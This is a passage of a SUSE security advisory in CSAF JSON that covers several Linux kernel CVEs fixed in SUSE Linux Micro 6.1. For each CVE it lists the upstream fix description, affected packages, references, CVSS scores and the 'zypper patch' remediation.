"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54094"
},
{
"cve": "CVE-2023-54095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/iommu: Fix notifiers being shared by PCI and VIO buses\n\nfail_iommu_setup() registers the fail_iommu_bus_notifier struct to both\nPCI and VIO buses. struct notifier_block is a linked list node, so this\ncauses any notifiers later registered to either bus type to also be\nregistered to the other since they share the same node.\n\nThis causes issues in (at least) the vgaarb code, which registers a\nnotifier for PCI buses. pci_notify() ends up being called on a vio\ndevice, converted with to_pci_dev() even though it\u0027s not a PCI device,\nand finally makes a bad access in vga_arbiter_add_pci_device() as\ndiscovered with KASAN:\n\n BUG: KASAN: slab-out-of-bounds in vga_arbiter_add_pci_device+0x60/0xe00\n Read of size 4 at addr c000000264c26fdc by task swapper/0/1\n\n Call Trace:\n dump_stack_lvl+0x1bc/0x2b8 (unreliable)\n print_report+0x3f4/0xc60\n kasan_report+0x244/0x698\n __asan_load4+0xe8/0x250\n vga_arbiter_add_pci_device+0x60/0xe00\n pci_notify+0x88/0x444\n notifier_call_chain+0x104/0x320\n blocking_notifier_call_chain+0xa0/0x140\n device_add+0xac8/0x1d30\n device_register+0x58/0x80\n vio_register_device_node+0x9ac/0xce0\n vio_bus_scan_register_devices+0xc4/0x13c\n __machine_initcall_pseries_vio_device_init+0x94/0xf0\n do_one_initcall+0x12c/0xaa8\n kernel_init_freeable+0xa48/0xba8\n kernel_init+0x64/0x400\n ret_from_kernel_thread+0x5c/0x64\n\nFix this by creating separate notifier_block structs for each bus type.\n\n[mpe: Add #ifdef to fix CONFIG_IBMVIO=n build]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54095",
"url": "https://www.suse.com/security/cve/CVE-2023-54095"
},
{
"category": "external",
"summary": "SUSE Bug 1256271 for CVE-2023-54095",
"url": "https://bugzilla.suse.com/1256271"
},
{
"category": "external",
"summary": "SUSE Bug 1256272 for CVE-2023-54095",
"url": "https://bugzilla.suse.com/1256272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54095"
},
{
"cve": "CVE-2023-54096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsoundwire: fix enumeration completion\n\nThe soundwire subsystem uses two completion structures that allow\ndrivers to wait for soundwire device to become enumerated on the bus and\ninitialised by their drivers, respectively.\n\nThe code implementing the signalling is currently broken as it does not\nsignal all current and future waiters and also uses the wrong\nreinitialisation function, which can potentially lead to memory\ncorruption if there are still waiters on the queue.\n\nNot signalling future waiters specifically breaks sound card probe\ndeferrals as codec drivers can not tell that the soundwire device is\nalready attached when being reprobed. Some codec runtime PM\nimplementations suffer from similar problems as waiting for enumeration\nduring resume can also timeout despite the device already having been\nenumerated.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54096",
"url": "https://www.suse.com/security/cve/CVE-2023-54096"
},
{
"category": "external",
"summary": "SUSE Bug 1256178 for CVE-2023-54096",
"url": "https://bugzilla.suse.com/1256178"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54096"
},
{
"cve": "CVE-2023-54099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs: Protect reconfiguration of sb read-write from racing writes\n\nThe reconfigure / remount code takes a lot of effort to protect\nfilesystem\u0027s reconfiguration code from racing writes on remounting\nread-only. However during remounting read-only filesystem to read-write\nmode userspace writes can start immediately once we clear SB_RDONLY\nflag. This is inconvenient for example for ext4 because we need to do\nsome writes to the filesystem (such as preparation of quota files)\nbefore we can take userspace writes so we are clearing SB_RDONLY flag\nbefore we are fully ready to accept userpace writes and syzbot has found\na way to exploit this [1]. Also as far as I\u0027m reading the code\nthe filesystem remount code was protected from racing writes in the\nlegacy mount path by the mount\u0027s MNT_READONLY flag so this is relatively\nnew problem. It is actually fairly easy to protect remount read-write\nfrom racing writes using sb-\u003es_readonly_remount flag so let\u0027s just do\nthat instead of having to workaround these races in the filesystem code.\n\n[1] https://lore.kernel.org/all/00000000000006a0df05f6667499@google.com/T/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54099",
"url": "https://www.suse.com/security/cve/CVE-2023-54099"
},
{
"category": "external",
"summary": "SUSE Bug 1256197 for CVE-2023-54099",
"url": "https://bugzilla.suse.com/1256197"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54099"
},
{
"cve": "CVE-2023-54101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndriver: soc: xilinx: use _safe loop iterator to avoid a use after free\n\nThe hash_for_each_possible() loop dereferences \"eve_data\" to get the\nnext item on the list. However the loop frees eve_data so it leads to\na use after free. Use hash_for_each_possible_safe() instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54101",
"url": "https://www.suse.com/security/cve/CVE-2023-54101"
},
{
"category": "external",
"summary": "SUSE Bug 1256153 for CVE-2023-54101",
"url": "https://bugzilla.suse.com/1256153"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54101"
},
{
"cve": "CVE-2023-54104",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54104"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: rawnand: fsl_upm: Fix an off-by one test in fun_exec_op()\n\n\u0027op-cs\u0027 is copied in \u0027fun-\u003emchip_number\u0027 which is used to access the\n\u0027mchip_offsets\u0027 and the \u0027rnb_gpio\u0027 arrays.\nThese arrays have NAND_MAX_CHIPS elements, so the index must be below this\nlimit.\n\nFix the sanity check in order to avoid the NAND_MAX_CHIPS value. This\nwould lead to out-of-bound accesses.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54104",
"url": "https://www.suse.com/security/cve/CVE-2023-54104"
},
{
"category": "external",
"summary": "SUSE Bug 1256145 for CVE-2023-54104",
"url": "https://bugzilla.suse.com/1256145"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
